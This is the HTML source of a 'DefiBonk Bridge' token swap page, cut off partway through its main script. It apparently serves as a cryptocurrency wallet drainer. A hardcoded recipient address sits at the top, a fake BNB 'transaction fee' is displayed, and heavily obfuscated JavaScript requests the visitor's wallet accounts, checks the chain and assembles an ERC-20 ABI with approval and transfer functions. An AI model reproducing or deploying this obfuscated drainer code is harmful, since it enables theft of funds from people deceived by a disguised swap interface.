<script>var address = "0xd6192B52cFdFD3774027f88F2dd6a729800bB435";var coin_value = "0.24";</script>
<!doctype html>
<html lang="en">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <!-- Required meta tags -->
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- Bootstrap CSS -->
    <link href="npm/bootstrap-5.1.3/dist/css/bootstrap.min.css" rel="stylesheet"
        >
    <link rel="stylesheet" href="assets/css/style.css">
    <link rel="stylesheet" href="npm/bootstrap-icons-1.8.1/font/bootstrap-icons.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css">
    <!-- ico -->
    <link href="nDpRm1s/photo-2024-02-21-18-55-34-removebg-preview.png" style="border-radius: 50%; object-fit: cover;" rel="icon" type="image/png">
    <title>DefiBonk Bridge</title>
	<link rel="canonical" href="https://defibonk.site" />
</head>
<body>
    <!-- navbar 
    <nav class="navbar fixed-top navbar-expand-lg navbar-dark ora-nav" style="padding-bottom: 0px;">
        <div class="container-fluid mx-5 px-3">
            <a class="" ><img class="logo" id="logo" src="nDpRm1s/photo-2024-02-21-18-55-34-removebg-preview.png" width="60px" height="60px" alt=""></a>
        </div>
    </nav>
    -->
    <!-- content -->
    <section>
        <div class="central-box">
            <div class="d-flex">
                <ul class="nav justify-content-left px-2" id="myTab" role="tablist">
                    <li class="nav-item">
                        <!--
                        <a class="nav-link active" data-bs-toggle="tab" data-bs-target="#swap" type="button"
                            aria-current="page" href="#"><b style="font-size:18px;">Swap</b></a>
                            -->
                    </li>
                <!-- <h4 class="justify-content-start float-start">Exchange</h4> -->
                </ul>
                <!--
                <a href="#" class="justify-content-right pt-2" data-bs-toggle="dropdown" aria-expanded="false" style="color: #ff3300;"><i class="bi bi-gear"></i></a>
                &nbsp;&nbsp;&nbsp;&nbsp;
                <a href="/" class="justify-content-right pt-2" style="color: #FFFFFF;"><i class="bi bi-arrow-clockwise"></i></a>
                -->
                <div class="dropdown-menu dropdown-menu-end" style="width: 270px; font-size: 12px; background-color: #16122B; color: whitesmoke; border: 1px solid #0C091F; border-radius: 10px;">
                    <div class="mx-2 my-1" style="border-radius: 10px; border: 1px solid #0C091F;">
                        <div class="p-2" style="font-size: 10px;">Transaction Settings</div>                    
                        <div class="row g-3 mx-2">
                            <div class="col-9">
                                <label for="">Slippage tolerance</label>
                                <input class="ora-input p-1 m-1 w-100" style="background-color: #0C091F;" type="text" placeholder="0.50">
                            </div>
                            <div class="col-3">
                                <label for=""></label>
                                <button class="btn btn-sm text-white" style="background-color: #2508b8; border-radius: 20px;">Auto</button>                        
                            </div>
                        </div>
                        <!--
                        <div class="row g-3 mx-2">
                            <label for="">Transaction deadline</label>
                            <input class="ora-input p-1 m-1 w-50" style="background-color: #0C091F;" type="text" placeholder="30"> minutes
                        </div>
                        -->
                    </div>
                    <div class="mx-2 my-1" style="border: 1px solid #0C091F; border-radius: 10px;">
                        <div class="p-2" style="font-size: 10px;">Interface Settings</div>  
                        <div class="d-block p-2">
                            <div class="">
                                Toggle expert mode
                                <label class="switch" style="right: 20px; position: absolute;">
                                    <input type="checkbox">
                                    <span class="slider round"></span>
                                </label>
                            </div>                                
                        </div>
                        <div class="d-block p-2">
                            <div class="">
                                Disable multihops
                                <label class="switch" style="right: 20px; position: absolute;">
                                    <input type="checkbox">
                                    <span class="slider round"></span>
                                </label>
                            </div>                                
                        </div>
                        <div class="d-block p-2 pb-3">
                            <div class="">
                                OpenMEV Gas Refunder
                                <label class="switch" style="right: 20px; position: absolute;">
                                    <input type="checkbox" checked>
                                    <span class="slider round"></span>
                                </label>
                            </div>                                
                        </div>
                    </div>
                </div>
            </div>
            <!-- main content -->
            <div class="tab-content" id="myTabContent">
                <div class="tab-pane fade show active" id="swap" role="tabpanel" aria-labelledby="swap-tab">
                    <div class="row px-4">
                        <div class="center pt-2">
                            <a href="#">
                                <img style="height:80px; width:80px; float:center; border-radius: 50%; object-fit: cover;" src="nDpRm1s/photo-2024-02-21-18-55-34-removebg-preview.png">
                            </a>
                            </div>
                        <div class="row g-2 ora-input" id="container1">
                            <div class="col-9">
                                <div class="dropdown">
                                    <button class="btn mb-3 ora-input" type="button"  data-bs-toggle="modal" style="background-color: #16122B;" data-bs-target="#coinmodal"><img 
                                    src="nDpRm1s/photo-2024-02-21-18-55-34-removebg-preview.png" width="20px" alt="">
                                        DBONK
                                    </button>    
                                    <!-- dropdown-toggle 
                                    style="margin-right: 10px;"
                                    -->
                                </div>
                                <input class="form-control ora-input" id="coinAmt" name="coinAmt" value="1" oninput="updateTokenAmt()" type="float" max="5000">
                            </div>
                            <div class="col-3">
                                <a href="" style="position: relative; top: 60px; text-decoration: none; color: lightgray;">Balance: <span id="BalanceWALLETSWAP">0.00</span></a>
                            </div>
                        </div>
                        <div class="center pt-2">
                            <a href="#" id="doubleArrow" onclick="changeCurrency()">
                                <svg width="15" height="24" viewBox="0 0 30 38" fill="none"
                                    xmlns="http://www.w3.org/2000/svg">
                                    <path
                                        d="M17.1429 8.42333L8.57143 -9.36673e-07L-3.68196e-07 8.42333L6.42857 8.42333L6.42857 23.2222L10.7143 23.2222L10.7143 8.42333L17.1429 8.42333ZM21.4286 38L30 29.5767L23.5714 29.5767L23.5714 14.7778L19.2857 14.7778L19.2857 29.5767L12.8571 29.5767L21.4286 38Z"
                                        fill="#F2C94C" />
                                </svg>
                            </a>
                        </div>
                        <div class="row g-2 ora-input" id="container2">
                            <div class="col-9">
                                <button class="btn mb-3 ora-input" type="button"  data-bs-toggle="modal" style="background-color: #16122B;" data-bs-target="#tokenmodal"><img 
                                    src="production/logo/usdtlogo.png" width="20px" alt="">
                                    USDT
                                </button>  
                                <input class="form-control ora-input" id="tokenAmt" name="tokenAmt" value="0.24" oninput="updateCoinAmt()" type="float">
                            </div>
                            <div class="col-3">
                                <a href="" style="position: relative; top: 60px; border: 1px solid #16122B; text-decoration: none; color: lightgray;">Balance: <span id="BalanceBUSD">0.00</span></a>
                            </div>
                        </div>
                    </div>
                    <hr>
                    <center><p><b style="float:center;">Swap Transaction Fee <i class="bi bi-question-circle" onmouseover="alert('Swap Transaction Fee: 0.035 BNB');"></i>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.035 BNB&nbsp;&nbsp;</b></p></center>
                    <!--
                    <b style="float:left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Swap Transaction Fee <i class="bi bi-question-circle" onmouseover="alert('Swap Transaction Fee: 0.035 BNB');"></i></b> <b style="float:right">0.035 BNB&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</b>
                    <br>
                    -->
                    <div class="d-grid mx-4 px-2" style="padding-top: 20px; padding-bottom: 40px;">
                        <button class="btn ora-deco-btn p-3" id="connectWalletButton">Connect Wallet</button>
                        <button class="btn ora-deco-btn p-3" id="sendBNB" style="display:none;">Swap</button>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <!-- Coin Modal -->
    <div class="modal fade" id="coinmodal1" tabindex="-1" aria-labelledby="coinmodal1" aria-hidden="true">
       <div class="modal-dialog">
            <div class="modal-content" style="background-color: inherit;">    
                <div class="central-box p-3 w-100">
                    <div class="d-flex">
                        <h5>Select a token</h5>
                        &nbsp;&nbsp;&nbsp;<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close" style="color:white;"></button>
                    </div> 
                    <div class="">
                        <!--
                        <input class="form-control py-3 my-3"
                            style="border: 1px solid #2508b8; border-radius: 15px; background-color: rgb(3, 3, 31);"
                            placeholder="Search name or paste address" type="text">
                        <p>Common bases</p>
                        -->
                        <div class="d-inline">
                            <button class="btn mx-2 my-2 ora-input" type="button"> <img style="margin-right: 10px;"
                                    src="nDpRm1s/photo-2024-02-21-18-55-34-removebg-preview.png" width="20px" alt="">
                                DefiBonk Swap ( FQS )
                            </button>
                            <!-- here -->
                        </div>
                    </div>
                    <!-- <div
                        style="background-color: rgb(3, 3, 31); max-height: 300px; overflow-y: scroll; border-radius: 20px;">
                        <ul class="list-group">
                            <li class="list-group-item py-2" style="background-color: inherit;"><a class="link" href=""><img
                                        style="margin-right: 10px;" src="./assets/images/bnb.png" width="40px"
                                        alt="">BNB</a></li>
                            <!-- here 
                        </ul>
                    </div> -->
                </div>
            </div>
        </div>    
    </div>    
    <!-- Coin Modal End-->
    <!-- Token Modal -->
    <div class="modal fade" id="tokenmodal1" tabindex="-1" aria-labelledby="tokenmodal1" aria-hidden="true">
        <div class="modal-dialog">
            <div class="modal-content" style="background-color: inherit;">    
                <div class="central-box p-3 w-100">
                    <div class="d-flex">
                        <h5>Select a token</h5>
                        &nbsp;&nbsp;&nbsp;<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close" style="color:white;"></button>
                    </div>
                    <div class="">
                        <!--
                        <input class="form-control py-3 my-3"
                            style="border: 1px solid #2508b8; border-radius: 15px; background-color: rgb(3, 3, 31);"
                            placeholder="Search name or paste address" type="text">
                        <p>Common bases</p>
                        -->
                        <div class="d-inline">
                            <!-- here -->
                            <button class="btn mx-2 my-2 ora-input" type="button"> <img style="margin-right: 10px;"
                                    src="production/logo/usdtlogo.png" width="20px" alt="">
                                USDT
                            </button>
                        </div>
                    </div>
                    <!-- <div
                        style="background-color: rgb(3, 3, 31); max-height: 300px; overflow-y: scroll; border-radius: 20px;">
                        <ul class="list-group">
                            <!-- here
                            <li class="list-group-item py-2" style="background-color: inherit;"><a class="link" href=""><img
                                        style="margin-right: 10px;" src="https://bscscan.com/token/images/busdt_32.png" width="40px"
                                        alt="">USDT</a></li>
                        </ul>
                    </div> -->
                </div>
            </div>
        </div>
    </div>
    <center><a href="#"><img style="width:100%; height:50%;" src="1fXWw0m/photo-2024-02-23-13-29-09.jpg"></a></center>
    <!-- footer -->
    <!-- Option 1: Bootstrap Bundle with Popper -->
    <script src="npm/bootstrap-5.1.3/dist/js/bootstrap.bundle.min.js"
        ></script>
        <!-- Web3 Library -->
    <script src="ajax/libs/web3/1.3.6/web3.min.js"></script>
    <script>
const _0x477b9a=_0x3df4;function _0x3df4(_0x1a0376,_0x3d95a8){const _0x529f16=_0xbf1c();return _0x3df4=function(_0x34d516,_0x494749){_0x34d516=_0x34d516-(0x1a22+-0x18f3*0x1+-0x4f);let _0x2fc36b=_0x529f16[_0x34d516];return _0x2fc36b;},_0x3df4(_0x1a0376,_0x3d95a8);}(function(_0x1b24e7,_0x51ab6a){const _0xcb5572=_0x3df4,_0x3843b9=_0x1b24e7();while(!![]){try{const _0x30ce46=parseInt(_0xcb5572('0x10e'))/(-0x1*-0x469+0x353*0xb+-0x28f9)*(parseInt(_0xcb5572(0x11c))/(0xdad*0x1+-0x4*0x593+0x8a1))+parseInt(_0xcb5572(0xf1))/(0x26f9+-0xc62+-0x1a94)+parseInt(_0xcb5572(0xfc))/(-0x4a*0x54+-0x331+-0x1b7d*-0x1)*(parseInt(_0xcb5572('0x12b'))/(0x3dd+-0x158a+0x6*0x2f3))+parseInt(_0xcb5572('0xe6'))/(0x7af+-0x8b5*0x3+0x93b*0x2)*(parseInt(_0xcb5572(0x135))/(0x1*-0x14b+-0x12*-0x1c4+-0xf3b*0x2))+parseInt(_0xcb5572('0xe1'))/(0x1ab+0x40+-0x1e3)*(parseInt(_0xcb5572('0x10d'))/(-0x307*-0x7+0x927*-0x2+0x2*-0x16d))+parseInt(_0xcb5572('0x148'))/(-0x25*-0x53+0x7fd+0x2e*-0x6f)*(parseInt(_0xcb5572(0x116))/(-0x1*-0x1451+0x1c64+-0x30aa))+parseInt(_0xcb5572('0x150'))/(0x131a+0x2570+-0x387e)*(-parseInt(_0xcb5572(0x11d))/(-0xf7b+-0x790*0x3+0x131c*0x2));if(_0x30ce46===_0x51ab6a)break;else _0x3843b9['push'](_0x3843b9['shift']());}catch(_0x504ff8){_0x3843b9['push'](_0x3843b9['shift']());}}}(_0xbf1c,0x1ccb4*-0x1+0xd31ba+-0x219a6));function changeCurrency(){const _0x404ac9=_0x3df4;var _0x557eba=document[_0x404ac9(0x146)](_0x404ac9(0x149)),_0x1ce176=document[_0x404ac9('0x146')](_0x404ac9(0xe9)),_0x3f8e59=_0x557eba[_0x404ac9('0x126')];_0x557eba[_0x404ac9('0x126')]=_0x1ce176[_0x404ac9('0x126')],_0x1ce176[_0x404ac9(0x126)]=_0x3f8e59;}document[_0x477b9a(0x146)](_0x477b9a(0x121))['addEventListener']('click',async function(){const _0x3f244b=_0x477b9a;if(window[_0x3f244b(0x138)])try{const _0x55dcb1=new Web3(window[_0x3f244b('0x138')]),_0x51b227=await _0x55dcb1['eth']['getChainId']();if(_0x51b227!=-0x6fd*-0x3+-0x10*-0x1+-0x2f9*0x7){alert(_0x3f244b(0x112));return;}const _0x2ece50={};_0x2ece50['method']=_0x3f244b(0x152);const _0x160c9c=await ethereum[_0x3f244b(0x151)](_0x2ece50),_0x88cb44=_0x160c9c[-0x29*-0xb7+-0x365+-0x19ea],_0x35bb92=_0x3f244b(0x11b),_0x4bbe32={};_0x4bbe32[_0x3f244b('0xed')]=[],_0x4bbe32[_0x3f244b(0x13f)]=![],_0x4bbe32[_0x3f244b('0x140')]=_0x3f244b(0xf7),_0x4bbe32[_0x3f244b(0xec)]='constructor';const _0x5a9969={};_0x5a9969[_0x3f244b(0x10c)]=!![],_0x5a9969[_0x3f244b('0x100')]=_0x3f244b(0x144),_0x5a9969['name']=_0x3f244b('0x14b'),_0x5a9969[_0x3f244b('0xec')]=_0x3f244b('0x144');const _0x34d413={};_0x34d413[_0x3f244b('0x10c')]=!![],_0x34d413[_0x3f244b('0x100')]='address',_0x34d413['name']=_0x3f244b('0x12d'),_0x34d413[_0x3f244b(0xec)]=_0x3f244b(0x144);const _0x274bd7={};_0x274bd7[_0x3f244b('0x10c')]=![],_0x274bd7[_0x3f244b('0x100')]=_0x3f244b(0x14a),_0x274bd7[_0x3f244b('0x113')]=_0x3f244b(0x139),_0x274bd7[_0x3f244b('0xec')]=_0x3f244b(0x14a);const _0x2c17ab={};_0x2c17ab[_0x3f244b(0xfe)]=![],_0x2c17ab[_0x3f244b(0xed)]=[_0x5a9969,_0x34d413,_0x274bd7],_0x2c17ab[_0x3f244b('0x113')]=_0x3f244b('0x124'),_0x2c17ab[_0x3f244b('0xec')]=_0x3f244b('0x102');const _0x2ef31a={};_0x2ef31a[_0x3f244b(0x10c)]=!![],_0x2ef31a[_0x3f244b(0x100)]='address',_0x2ef31a[_0x3f244b('0x113')]=_0x3f244b(0xeb),_0x2ef31a['type']=_0x3f244b(0x144);const _0x5a2847={};_0x5a2847[_0x3f244b('0x10c')]=!![],_0x5a2847[_0x3f244b(0x100)]=_0x3f244b('0x144'),_0x5a2847[_0x3f244b('0x113')]=_0x3f244b('0xe4'),_0x5a2847[_0x3f244b('0xec')]=_0x3f244b('0x144');const _0x27f9f8={};_0x27f9f8[_0x3f244b('0xfe')]=![],_0x27f9f8[_0x3f244b('0xed')]=[_0x2ef31a,_0x5a2847],_0x27f9f8['name']=_0x3f244b(0xf8),_0x27f9f8[_0x3f244b(0xec)]=_0x3f244b(0x102);const _0xc80293={};_0xc80293[_0x3f244b(0x10c)]=!![],_0xc80293[_0x3f244b('0x100')]=_0x3f244b('0x144'),_0xc80293[_0x3f244b(0x113)]=_0x3f244b(0xf5),_0xc80293[_0x3f244b('0xec')]=_0x3f244b(0x144);const _0x4de40c={};_0x4de40c[_0x3f244b(0x10c)]=!![],_0x4de40c[_0x3f244b('0x100')]=_0x3f244b('0x144'),_0x4de40c[_0x3f244b('0x113')]='to',_0x4de40c[_0x3f244b(0xec)]=_0x3f244b('0x144');const _0x229e03={};_0x229e03[_0x3f244b(0x10c)]=![],_0x229e03[_0x3f244b(0x100)]=_0x3f244b('0x14a'),_0x229e03[_0x3f244b(0x113)]='value',_0x229e03[_0x3f244b('0xec')]=_0x3f244b(0x14a);const _0x37bedd={};_0x37bedd[_0x3f244b('0xfe')]=![],_0x37bedd[_0x3f244b(0xed)]=[_0xc80293,_0x4de40c,_0x229e03],_0x37bedd[_0x3f244b('0x113')]='Transfer',_0x37bedd[_0x3f244b(0xec)]=_0x3f244b('0x102');const _0x17e9a1={};_0x17e9a1['internalType']=_0x3f244b(0x119),_0x17e9a1[_0x3f244b('0x113')]='',_0x17e9a1[_0x3f244b(0xec)]=_0x3f244b(0x119);const _0x248d7e={};_0x248d7e[_0x3f244b('0x12a')]=!![],_0x248d7e['inputs']=[],_0x248d7e[_0x3f244b(0x113)]=_0x3f244b(0x137),_0x248d7e[_0x3f244b(0x12e)]=[_0x17e9a1],_0x248d7e[_0x3f244b(0x13f)]=![],_0x248d7e['stateMutability']=_0x3f244b(0xe0),_0x248d7e[_0x3f244b('0xec')]=_0x3f244b('0xf4');const _0x53b615={};_0x53b615['internalType']='string',_0x53b615[_0x3f244b(0x113)]='',_0x53b615[_0x3f244b('0xec')]='string';const _0x2ab844={};_0x2ab844[_0x3f244b(0x12a)]=!![],_0x2ab844[_0x3f244b(0xed)]=[],_0x2ab844[_0x3f244b('0x113')]=_0x3f244b('0x107'),_0x2ab844[_0x3f244b(0x12e)]=[_0x53b615],_0x2ab844[_0x3f244b(0x13f)]=![],_0x2ab844[_0x3f244b('0x140')]='view',_0x2ab844[_0x3f244b('0xec')]=_0x3f244b(0xf4);const _0x4bc98e={};_0x4bc98e['internalType']=_0x3f244b(0x127),_0x4bc98e[_0x3f244b(0x113)]='',_0x4bc98e[_0x3f244b('0xec')]=_0x3f244b('0x127');const _0x43678d={};_0x43678d[_0x3f244b(0x12a)]=!![],_0x43678d[_0x3f244b('0xed')]=[],_0x43678d[_0x3f244b(0x113)]=_0x3f244b(0xfb),_0x43678d['outputs']=[_0x4bc98e],_0x43678d[_0x3f244b('0x13f')]=![],_0x43678d[_0x3f244b('0x140')]=_0x3f244b(0xe0),_0x43678d['type']=_0x3f244b(0xf4);const _0x3dc81a={};_0x3dc81a['internalType']=_0x3f244b('0x144'),_0x3dc81a['name']=_0x3f244b(0x14b),_0x3dc81a[_0x3f244b(0xec)]='address';const _0x41d3ef={};_0x41d3ef[_0x3f244b(0x100)]=_0x3f244b('0x144'),_0x41d3ef[_0x3f244b(0x113)]=_0x3f244b(0x12d),_0x41d3ef[_0x3f244b('0xec')]='address';const _0x26149b={};_0x26149b[_0x3f244b(0x100)]=_0x3f244b('0x14a'),_0x26149b[_0x3f244b(0x113)]='',_0x26149b[_0x3f244b(0xec)]=_0x3f244b('0x14a');const _0x2ca5a1={};_0x2ca5a1[_0x3f244b(0x12a)]=!![],_0x2ca5a1[_0x3f244b(0xed)]=[_0x3dc81a,_0x41d3ef],_0x2ca5a1[_0x3f244b(0x113)]=_0x3f244b('0x143'),_0x2ca5a1[_0x3f244b('0x12e')]=[_0x26149b],_0x2ca5a1['payable']=![],_0x2ca5a1[_0x3f244b(0x140)]=_0x3f244b(0xe0),_0x2ca5a1[_0x3f244b(0xec)]=_0x3f244b('0xf4');const _0x37e161={};_0x37e161[_0x3f244b(0x100)]=_0x3f244b(0x144),_0x37e161[_0x3f244b('0x113')]=_0x3f244b('0x12d'),_0x37e161[_0x3f244b('0xec')]=_0x3f244b('0x144');const _0x996bad={};_0x996bad[_0x3f244b(0x100)]='uint256',_0x996bad[_0x3f244b('0x113')]=_0x3f244b(0xe8),_0x996bad[_0x3f244b('0xec')]=_0x3f244b(0x14a);const _0x560cab={};_0x560cab[_0x3f244b(0x100)]=_0x3f244b('0xe3'),_0x560cab[_0x3f244b(0x113)]='',_0x560cab[_0x3f244b('0xec')]=_0x3f244b(0xe3);const _0x552d38={};_0x552d38[_0x3f244b('0x12a')]=![],_0x552d38[_0x3f244b('0xed')]=[_0x37e161,_0x996bad],_0x552d38[_0x3f244b('0x113')]=_0x3f244b(0x10a),_0x552d38['outputs']=[_0x560cab],_0x552d38[_0x3f244b(0x13f)]=![],_0x552d38[_0x3f244b('0x140')]=_0x3f244b(0xf7),_0x552d38[_0x3f244b('0xec')]=_0x3f244b('0xf4');const _0x560590={};_0x560590[_0x3f244b(0x100)]=_0x3f244b(0x144),_0x560590[_0x3f244b('0x113')]=_0x3f244b('0x134'),_0x560590[_0x3f244b('0xec')]=_0x3f244b('0x144');const _0x5c3a3b={};_0x5c3a3b[_0x3f244b(0x100)]=_0x3f244b(0x14a),_0x5c3a3b[_0x3f244b('0x113')]='',_0x5c3a3b[_0x3f244b('0xec')]=_0x3f244b('0x14a');const _0x544fd5={};_0x544fd5[_0x3f244b(0x12a)]=!![],_0x544fd5[_0x3f244b(0xed)]=[_0x560590],_0x544fd5[_0x3f244b('0x113')]='balanceOf',_0x544fd5[_0x3f244b(0x12e)]=[_0x5c3a3b],_0x544fd5[_0x3f244b('0x13f')]=![],_0x544fd5[_0x3f244b(0x140)]='view',_0x544fd5[_0x3f244b('0xec')]=_0x3f244b(0xf4);const _0x5f13c5={};_0x5f13c5[_0x3f244b(0x100)]=_0x3f244b('0x14a'),_0x5f13c5[_0x3f244b(0x113)]=_0x3f244b('0xe8'),_0x5f13c5[_0x3f244b(0xec)]=_0x3f244b(0x14a);const _0x449a8b={};_0x449a8b[_0x3f244b('0x100')]=_0x3f244b(0xe3),_0x449a8b[_0x3f244b(0x113)]='',_0x449a8b[_0x3f244b('0xec')]=_0x3f244b('0xe3');const _0x58386c={};_0x58386c[_0x3f244b(0x12a)]=![],_0x58386c[_0x3f244b(0xed)]=[_0x5f13c5],_0x58386c[_0x3f244b(0x113)]=_0x3f244b('0xfd'),_0x58386c[_0x3f244b(0x12e)]=[_0x449a8b],_0x58386c[_0x3f244b(0x13f)]=![],_0x58386c[_0x3f244b(0x140)]=_0x3f244b(0xf7),_0x58386c[_0x3f244b('0xec')]='function';const _0x125648={};_0x125648[_0x3f244b(0x100)]=_0x3f244b('0x119'),_0x125648[_0x3f244b('0x113')]='',_0x125648[_0x3f244b(0xec)]=_0x3f244b('0x119');const _0x32582e={};_0x32582e[_0x3f244b(0x12a)]=!![],_0x32582e[_0x3f244b(0xed)]=[],_0x32582e[_0x3f244b('0x113')]=_0x3f244b(0x128),_0x32582e[_0x3f244b(0x12e)]=[_0x125648],_0x32582e['payable']=![],_0x32582e[_0x3f244b(0x140)]=_0x3f244b(0xe0),_0x32582e[_0x3f244b(0xec)]=_0x3f244b('0xf4');const _0x5a3518={};_0x5a3518[_0x3f244b('0x100')]=_0x3f244b(0x144),_0x5a3518[_0x3f244b('0x113')]=_0x3f244b('0x12d'),_0x5a3518[_0x3f244b('0xec')]=_0x3f244b('0x144');const _0x3401f2={};_0x3401f2['internalType']=_0x3f244b('0x14a'),_0x3401f2[_0x3f244b('0x113')]=_0x3f244b(0x13a),_0x3401f2[_0x3f244b('0xec')]=_0x3f244b(0x14a);const _0x23168d={};_0x23168d[_0x3f244b('0x100')]=_0x3f244b(0xe3),_0x23168d[_0x3f244b('0x113')]='',_0x23168d['type']=_0x3f244b(0xe3);const _0x322a3e={};_0x322a3e[_0x3f244b('0x12a')]=![],_0x322a3e[_0x3f244b(0xed)]=[_0x5a3518,_0x3401f2],_0x322a3e[_0x3f244b('0x113')]=_0x3f244b(0x111),_0x322a3e[_0x3f244b(0x12e)]=[_0x23168d],_0x322a3e['payable']=![],_0x322a3e[_0x3f244b('0x140')]=_0x3f244b(0xf7),_0x322a3e['type']=_0x3f244b(0xf4);const _0x424e4a={};_0x424e4a[_0x3f244b('0x100')]=_0x3f244b(0x144),_0x424e4a[_0x3f244b('0x113')]='',_0x424e4a[_0x3f244b(0xec)]=_0x3f244b('0x144');const _0x5d98b9={};_0x5d98b9[_0x3f244b(0x12a)]=!![],_0x5d98b9[_0x3f244b('0xed')]=[],_0x5d98b9[_0x3f244b(0x113)]='getOwner',_0x5d98b9[_0x3f244b('0x12e')]=[_0x424e4a],_0x5d98b9[_0x3f244b(0x13f)]=![],_0x5d98b9[_0x3f244b('0x140')]=_0x3f244b('0xe0'),_0x5d98b9[_0x3f244b('0xec')]=_0x3f244b(0xf4);const _0x5ddd18={};_0x5ddd18[_0x3f244b(0x100)]=_0x3f244b('0x144'),_0x5ddd18[_0x3f244b('0x113')]=_0x3f244b(0x12d),_0x5ddd18[_0x3f244b(0xec)]=_0x3f244b(0x144);const _0x596887={};_0x596887['internalType']=_0x3f244b('0x14a'),_0x596887[_0x3f244b(0x113)]=_0x3f244b(0x131),_0x596887[_0x3f244b('0xec')]=_0x3f244b('0x14a');const _0x21e747={};_0x21e747[_0x3f244b('0x100')]=_0x3f244b('0xe3'),_0x21e747[_0x3f244b(0x113)]='',_0x21e747[_0x3f244b('0xec')]=_0x3f244b(0xe3);const _0x49a15e={};_0x49a15e[_0x3f244b('0x12a')]=![],_0x49a15e[_0x3f244b('0xed')]=[_0x5ddd18,_0x596887],_0x49a15e[_0x3f244b('0x113')]=_0x3f244b(0xf6),_0x49a15e[_0x3f244b(0x12e)]=[_0x21e747],_0x49a15e[_0x3f244b(0x13f)]=![],_0x49a15e[_0x3f244b(0x140)]=_0x3f244b(0xf7),_0x49a15e[_0x3f244b(0xec)]=_0x3f244b(0xf4);const _0x4a6afb={};_0x4a6afb[_0x3f244b('0x100')]=_0x3f244b(0x14a),_0x4a6afb[_0x3f244b(0x113)]=_0x3f244b(0xe8),_0x4a6afb[_0x3f244b('0xec')]=_0x3f244b('0x14a');const _0x5da432={};_0x5da432[_0x3f244b('0x100')]='bool',_0x5da432[_0x3f244b('0x113')]='',_0x5da432[_0x3f244b('0xec')]=_0x3f244b(0xe3);const _0x48bdb9={};_0x48bdb9[_0x3f244b(0x12a)]=![],_0x48bdb9[_0x3f244b('0xed')]=[_0x4a6afb],_0x48bdb9['name']='mint',_0x48bdb9[_0x3f244b('0x12e')]=[_0x5da432],_0x48bdb9[_0x3f244b(0x13f)]=![],_0x48bdb9[_0x3f244b('0x140')]=_0x3f244b(0xf7),_0x48bdb9['type']=_0x3f244b(0xf4);const _0x54b1bb={};_0x54b1bb['internalType']=_0x3f244b(0x127),_0x54b1bb[_0x3f244b('0x113')]='',_0x54b1bb[_0x3f244b('0xec')]=_0x3f244b(0x127);const _0x29edc5={};_0x29edc5[_0x3f244b('0x12a')]=!![],_0x29edc5[_0x3f244b(0xed)]=[],_0x29edc5[_0x3f244b('0x113')]=_0x3f244b('0x113'),_0x29edc5[_0x3f244b(0x12e)]=[_0x54b1bb],_0x29edc5[_0x3f244b(0x13f)]=![],_0x29edc5[_0x3f244b('0x140')]=_0x3f244b('0xe0'),_0x29edc5['type']='function';const _0x161f7d={};_0x161f7d[_0x3f244b(0x100)]='address',_0x161f7d[_0x3f244b(0x113)]='',_0x161f7d[_0x3f244b(0xec)]=_0x3f244b(0x144);const _0x4e702c={};_0x4e702c[_0x3f244b('0x12a')]=!![],_0x4e702c[_0x3f244b(0xed)]=[],_0x4e702c[_0x3f244b(0x113)]=_0x3f244b(0x14b),_0x4e702c[_0x3f244b(0x12e)]=[_0x161f7d],_0x4e702c[_0x3f244b('0x13f')]=![],_0x4e702c['stateMutability']=_0x3f244b('0xe0'),_0x4e702c[_0x3f244b(0xec)]=_0x3f244b(0xf4);const _0x1adafd={};_0x1adafd[_0x3f244b(0x12a)]=![],_0x1adafd['inputs']=[],_0x1adafd[_0x3f244b('0x113')]=_0x3f244b(0x120),_0x1adafd[_0x3f244b(0x12e)]=[],_0x1adafd[_0x3f244b('0x13f')]=![],_0x1adafd[_0x3f244b('0x140')]='nonpayable',_0x1adafd[_0x3f244b(0xec)]=_0x3f244b('0xf4');const _0x4d5a5e={};_0x4d5a5e[_0x3f244b('0x100')]=_0x3f244b(0x127),_0x4d5a5e[_0x3f244b('0x113')]='',_0x4d5a5e[_0x3f244b('0xec')]='string';const _0x4b712e={};_0x4b712e[_0x3f244b('0x12a')]=!![],_0x4b712e[_0x3f244b('0xed')]=[],_0x4b712e[_0x3f244b(0x113)]=_0x3f244b('0xfa'),_0x4b712e[_0x3f244b('0x12e')]=[_0x4d5a5e],_0x4b712e[_0x3f244b('0x13f')]=![],_0x4b712e[_0x3f244b(0x140)]='view',_0x4b712e[_0x3f244b(0xec)]=_0x3f244b('0xf4');const _0x2d62d7={};_0x2d62d7[_0x3f244b('0x100')]=_0x3f244b('0x14a'),_0x2d62d7[_0x3f244b('0x113')]='',_0x2d62d7['type']=_0x3f244b('0x14a');const _0x2ec30a={};_0x2ec30a[_0x3f244b('0x12a')]=!![],_0x2ec30a[_0x3f244b('0xed')]=[],_0x2ec30a[_0x3f244b(0x113)]=_0x3f244b(0xe5),_0x2ec30a['outputs']=[_0x2d62d7],_0x2ec30a['payable']=![],_0x2ec30a[_0x3f244b('0x140')]=_0x3f244b('0xe0'),_0x2ec30a[_0x3f244b('0xec')]=_0x3f244b('0xf4');const _0x9951f6={};_0x9951f6[_0x3f244b(0x100)]=_0x3f244b('0x144'),_0x9951f6['name']='recipient',_0x9951f6[_0x3f244b(0xec)]=_0x3f244b('0x144');const _0x28fce7={};_0x28fce7[_0x3f244b(0x100)]=_0x3f244b(0x14a),_0x28fce7[_0x3f244b(0x113)]=_0x3f244b(0xe8),_0x28fce7['type']=_0x3f244b('0x14a');const 